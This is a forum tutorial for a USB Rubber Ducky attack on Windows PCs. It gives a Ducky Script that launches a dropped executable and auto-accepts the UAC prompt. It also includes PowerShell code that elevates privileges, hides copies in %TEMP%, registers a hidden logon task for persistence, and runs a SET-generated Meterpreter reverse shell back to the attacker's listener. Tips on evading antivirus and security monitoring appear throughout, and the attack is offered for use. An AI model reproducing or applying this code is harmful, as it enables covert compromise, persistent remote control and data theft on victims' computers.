Hi there, I'm new to this forum and so I thought I'd introduce myself with a nice tutorial! :) I've created a Ducky Script and coded an executable which will achieve the title of this topic. This makes use of the Twin Duck firmware, so that is a prerequisite before starting unless you can apply the same thing to ducky-decode or similar. Another prerequisite is .NET Framework 4.5, but PCs with Windows 8+ have this by default and loads of applications use it, so the likelihood of a pre-Windows 8 PC not having it is fairly low (I might make a native payload later).
What the executable does:
- Checks the current privilege level: already elevated (admin), a member of the Administrators group running unelevated, or a non-privileged user.
- Depending on that level, either continues execution or attempts to elevate.
(- If the user is in the Administrators group this produces a normal UAC consent prompt, so the ducky script we use later can hit 'ALT Y'.)
- Copies itself and the required DLLs to the default TEMP directory and sets all of those files to hidden.
- Creates a hidden Task Scheduler task which runs the executable at each user logon.
- Executes the encoded PowerShell payload.
Why smart privilege checking is important:
If a completely non-privileged user executed the program and it asked for UAC anyway, the UAC credential prompt would appear, asking for an administrator's username and password.
This is obviously problematic. In this circumstance we would rather our payload ran with normal privileges, because non-privileged access is better than no access, right? This is why I have incorporated the privilege escalation into the executable rather than the ducky script, so this prompt is never displayed and instead we get a normal user-level Meterpreter shell. If the user is part of the Administrators group, we see the UAC consent dialog instead (Yes/No, no password required).
This is where we'd like our ducky script to hit 'ALT Y' and bam! We can then just use Meterpreter's 'getsystem' command and we're away!
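The privilege decision above, together with the hidden copy and logon task from the feature list, as an added PowerShell example. This is not the C# project from the post; names such as Get-PrivilegeLevel, Invoke-SmartElevate and Install-Persistence are illustrative. It assumes it runs as a .ps1 (so $PSCommandPath is set), Windows 8 or later for the ScheduledTasks cmdlets, and that the single line SET produced is pasted into $PayloadCommandLine. What it adds to the text: TokenElevationType from GetTokenInformation tells the three cases apart directly, so an Administrators member on a filtered token (consent prompt, which ALT Y accepts) is distinguished from a standard user (credential prompt, which we avoid) without guessing from group membership.

```powershell
# Added example, not the tutorial's C# project: elevate-or-continue, hidden copy
# to %TEMP%, hidden logon task, then the SET payload. Assumptions (not from the
# post): run as a .ps1 so $PSCommandPath is set; Windows 8+ (ScheduledTasks module);
# $PayloadCommandLine holds the one-line command SET emitted. Names are illustrative.

$PayloadCommandLine = ''   # paste the one-line PowerShell command SET produced

Add-Type -Namespace Demo -Name Token -MemberDefinition @'
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool GetTokenInformation(IntPtr TokenHandle, int TokenInformationClass,
    out int TokenInformation, int TokenInformationLength, out int ReturnLength);
'@

function Get-PrivilegeLevel {
    # TokenElevationType (information class 18) values:
    #   1 Default = no split token (standard user, or UAC switched off)
    #   2 Full    = this process is already elevated
    #   3 Limited = Administrators member on the filtered token; a consent
    #               prompt (no password) is enough to elevate
    $token = [Security.Principal.WindowsIdentity]::GetCurrent().Token
    [int]$type = 0; [int]$len = 0
    if (-not [Demo.Token]::GetTokenInformation($token, 18, [ref]$type, 4, [ref]$len)) {
        throw ("GetTokenInformation failed: " + [Runtime.InteropServices.Marshal]::GetLastWin32Error())
    }
    switch ($type) {
        2 { return 'Elevated' }
        3 { return 'AdminGroup' }
        default {
            # UAC off: an admin's only token is already full, so treat it as elevated.
            $p = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
            if ($p.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { return 'Elevated' }
            return 'Standard'
        }
    }
}

function Invoke-SmartElevate {
    # $true when running elevated. Relaunches through UAC only when the prompt
    # would be a consent dialog (ALT Y can accept it), never for a standard user,
    # where the prompt would demand an administrator password instead.
    switch (Get-PrivilegeLevel) {
        'Elevated'   { return $true }
        'Standard'   { return $false }
        'AdminGroup' {
            $argList = "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$PSCommandPath`""
            Start-Process -FilePath 'powershell.exe' -Verb RunAs -ArgumentList $argList
            exit   # the elevated copy takes over from the top
        }
    }
}

function Install-Persistence {
    param([string]$SourcePath, [bool]$Elevated, [string]$TaskName = 'UserUpdateCheck')
    # Hidden copy in %TEMP%, then a hidden task that runs that copy at this user's logon.
    $dest = Join-Path $env:TEMP (Split-Path -Leaf $SourcePath)
    Copy-Item -LiteralPath $SourcePath -Destination $dest -Force
    $item = Get-Item -LiteralPath $dest -Force
    $item.Attributes = $item.Attributes -bor [IO.FileAttributes]::Hidden

    $action   = New-ScheduledTaskAction -Execute 'powershell.exe' `
                    -Argument "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$dest`""
    $trigger  = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME
    $settings = New-ScheduledTaskSettingsSet -Hidden
    $level    = if ($Elevated) { 'Highest' } else { 'Limited' }   # Highest is only honoured for admins
    Register-ScheduledTask -TaskName $TaskName -Action $action -Trigger $trigger `
        -Settings $settings -RunLevel $level -Force | Out-Null
    return $dest
}

$elevated = Invoke-SmartElevate
$dropped  = Install-Persistence -SourcePath $PSCommandPath -Elevated $elevated
Write-Verbose "Privilege: $(Get-PrivilegeLevel); persisted at $dropped"

if ($PayloadCommandLine) {
    # Launch SET's command line detached and hidden, as the executable does.
    Start-Process -FilePath 'cmd.exe' -ArgumentList "/c $PayloadCommandLine" -WindowStyle Hidden
}
```

Run unelevated by an Administrators-group user, the script relaunches itself through the consent prompt and the elevated copy registers the task at Highest run level; run by a standard user it never prompts and registers a Limited task pointing at the hidden copy in %TEMP%, which is exactly the "some access beats no access" behaviour described above.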
What you'll need:
- Windows PC/VM with Visual Studio 2013/2015/2017 installed (free downloads from Microsoft).
- Linux-based PC/VM for generating our payload and listening for connections. Preferably Kali Linux, as we will be using SET (the Social-Engineer Toolkit) to generate our PowerShell payload.
- USB Rubber Ducky (with Twin Duck or similar firmware installed)
- This Visual Studio project: http://www37.zippyshare.com/v/9GYYXKVl/file.html (On your Windows PC/VM, unzip it before)
- On the Kali Linux side of things, let's open SET by going to 'Applications' -> 'Social Engineering Tools' -> 'social engineering toolkit'.
- You will be presented with various options, hit '1' and then enter.
- Again more options, hit '9' or whichever number corresponds to 'Powershell Attack Vectors' and then enter.
- More options, hit '1' and then enter.
- Give it your local IP (or external IP if you want a connection from outside your local network, this would require port-forwarding)
- Give it a port and then say 'yes' when it asks if you want to start the listener.
- Now type this command (change path if necessary): 'sudo php -S 0.0.0.0:80 -t /root/.set/reports/powershell/'
- You have just started a webserver on port 80. Navigate over there on your Windows PC's web browser with the file name in the path like so: '192.168.0.XXX/x86_powershell_injection.txt'
You should be faced with this screen:
- Select all the text and copy it.
- Open Visual Studio and click 'Open Project'. Navigate to the 'PSExec' folder that you unzipped and select the Visual Studio solution file:
- Go to the line with the pre-inserted PowerShell payload (Line 64):
- Replace the text within the double quotes with the payload you got from the web server earlier.
- Go to the build menu at the top and click 'Build Solution'. Make sure the drop-downs below the menu bar say 'Release' and 'Any CPU', if not just change them.
- Navigate to the path printed at the bottom of the Output window to find the DLLs and exe file we need.
- Plug your Ducky's micro SD card into your PC and copy the files 'PSExec.exe', 'Microsoft.Win32.TaskScheduler.dll' and 'JetBrains.Annotations.dll' to the Ducky drive.
- Now we need our ducky payload. Here is the code (the DELAY, GUI r, ENTER and ALT y lines around the STRING are the assumed surroundings that the 'ALT Y' step above needs; tune the delays as noted below):
REM Awesome script
DELAY 1000
GUI r
DELAY 500
STRING cmd /k "for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do start "" %a\PSExec.exe"
ENTER
DELAY 3000
ALT y
- Generate your inject.bin file with an encoder.
- Copy the inject.bin to your Ducky's drive and there we have it!
- The 'PSExec.exe' file is not detected by antivirus at the time of writing, but if an antivirus wants to scan the file before running it, it may interfere with the ducky script. Bear in mind that 'PSExec.exe' is also the name of the Sysinternals PsExec tool, which security monitoring commonly watches for, so renaming the build is worth considering.
- Slower PCs may need slightly longer delays in the ducky script, but hey, just experiment until it works!
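The job the STRING line does, finding the Twin Duck volume by its label and launching the executable from it, as an added PowerShell example that is not part of the original post. It assumes the volume is labelled exactly 'DUCKY' and PSExec.exe sits in its root, as in the tutorial; the function names are illustrative. It uses Get-CimInstance rather than wmic (which is deprecated in current Windows releases), restricts the match to removable disks, and fails loudly when the drive has not enumerated yet, which is the usual reason the one-liner silently does nothing on a slow machine.

```powershell
# Added example, not from the original post: locate the Twin Duck storage volume
# by label and launch the dropped executable from it, the job the cmd/wmic
# one-liner in the ducky script does. Assumes the volume label is exactly 'DUCKY'
# and PSExec.exe is in its root, as in the tutorial.

function Get-DuckyDrive {
    param([string]$Label = 'DUCKY')
    # DriveType 2 = removable disk. Filtering on it, and matching the label exactly
    # rather than with find "DUCKY", avoids picking a fixed disk or network share
    # whose label merely contains the word.
    Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=2 AND VolumeName='$Label'" |
        Select-Object -First 1 -ExpandProperty DeviceID      # e.g. 'E:'
}

function Start-DuckyPayload {
    param([string]$Label = 'DUCKY', [string]$FileName = 'PSExec.exe')
    $drive = Get-DuckyDrive -Label $Label
    if (-not $drive) {
        # Typical cause on a slow machine: the keystrokes ran before the mass-storage
        # half of the Twin Duck enumerated. Lengthen the DELAY before the STRING line.
        throw "No removable volume labelled '$Label' is mounted yet."
    }
    $path = Join-Path -Path "$drive\" -ChildPath $FileName
    if (-not (Test-Path -LiteralPath $path)) { throw "'$path' not found on the ducky drive." }
    # Detached start, as 'start ""' does in the cmd version.
    Start-Process -FilePath $path -WorkingDirectory "$drive\"
}

Start-DuckyPayload

# The same logic collapsed into one STRING line for the ducky script (assumed
# equivalent; doubled single quotes are PowerShell's escape inside a single-quoted string):
# STRING powershell -w hidden -c "$d=(gcim Win32_LogicalDisk -Filter 'DriveType=2 AND VolumeName=''DUCKY''').DeviceID; start ($d+'\PSExec.exe')"
```

Typed into the Run dialog this spawns PowerShell instead of a visible cmd /k window, which is also a little less conspicuous on the target's screen while the ALT Y keystroke is being sent.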
So tell me what you think, feedback is greatly appreciated!